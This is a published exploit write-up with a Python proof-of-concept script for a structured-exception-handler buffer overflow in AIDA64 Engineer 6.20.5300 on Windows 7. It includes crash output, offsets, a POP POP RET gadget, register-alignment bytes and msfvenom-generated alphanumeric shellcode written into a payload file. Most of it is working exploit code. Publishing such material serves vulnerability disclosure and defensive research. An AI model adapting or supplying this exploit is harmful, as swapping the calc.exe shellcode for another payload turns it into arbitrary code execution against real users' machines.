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AIDA64 Engineer 6.20.5300 Buffer Overflow

AIDA64 Engineer 6.20.5300 Buffer Overflow
Posted Apr 2, 2020
Authored by Hodorsec

AIDA64 Engineer version 6.20.5300 Report File filename SEH buffer overflow exploit.

tags | exploit, overflow
SHA-256 | fe7db04e0b5015baf2963e005ec2c8ca15943475775055a6ef16d357d909edb1

AIDA64 Engineer 6.20.5300 Buffer Overflow

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# Exploit Title:    AIDA64 Engineer - 'Report File' filename Buffer Overflow (SEH)
# Date: 2020-04-02
# Exploit Author: Hodorsec
# Version: v6.20.5300
# Software Link: http://download.aida64.com/aida64engineer620.exe
# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open AIDA64 Engineer
# - First, click on "File", "Preferences"
# - Click menu "Report", "Report File"
# - Enter a long string in the field "File name"
# - Set "File extension" to automatic, as by default
# - Click OK
# - Second, in the main menu, click "Report" which shows the "Report Wizard"
# - Next, "System Summary only", next, "Plain Text", Finish
# - Click the button "Send In E-mail"
# - Check results

# WinDBG initial crash output using only A's:
# (994.998): Access violation - code c0000005 (!!! second chance !!!)
# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
# ntdll!RtlAcquireSRWLockShared+0x1a:
# 77f133a8 8365f400 and dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????

#!/usr/bin/python
import sys,struct

filename = "aida64_engineer_poc.txt"

# Maximum length
maxlen = 5000

# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax
# Payload size: 440 bytes
shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30"
"\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43"
"\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b"
"\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52"
"\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c"
"\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a"
"\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30"
"\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78"
"\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70"
"\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32"
"\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f"
"\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79"
"\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d"
"\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57"
"\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38"
"\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38"
"\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51"
"\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71"
"\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55"
"\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b"
"\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d"
"\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a"
"\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66"
"\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75"
"\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53"
"\x55\x65\x50\x41\x41"
)

# Align the registers
# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d
align_eax = (
"\x56" # PUSH ESI
"\x58" # POP EAX
"\x66\x05\x3f\x10" # ADD AX,0x103f # EAX = 0x04aaffff
"\x40" # INC EAX # EAX = 0x04ab0000
"\x66\x05\x01\x7F" # ADD AX,0x7f01 # EAX = 0x04ab7f01
"\x66\x05\x6b\x7c" # ADD AX,0x7c6b # EAX = 0x04abfb6c
"\x50" # PUSH EAX
)

# Offsets
crash_ebp = 307
crash_esi = 1583
crash_seh = 319
crash_nseh = crash_seh - 4

# Variables
ascii_nop = "\x47" # Doesn't do anything particular for this program
nops = ascii_nop * 32 # ASCII NOP's amount

# Prefix
prefix = "A" * crash_nseh
nseh = "\x71\x06\x70\x04" # JNO SHORT # JO SHORT # Jump over NSEH/SEH
seh = struct.pack("<L", 0x0121076e) # POP POP RET # aida64.exe
suffix = align_eax # Align registers to execute shellcode
suffix += nops # Some ASCII friendly NOP's
suffix += shellcode # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together

try:
file = open(filename,"wb")
file.write(payload)
file.close()
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
print "[!] Error creating file!"
sys.exit(0)


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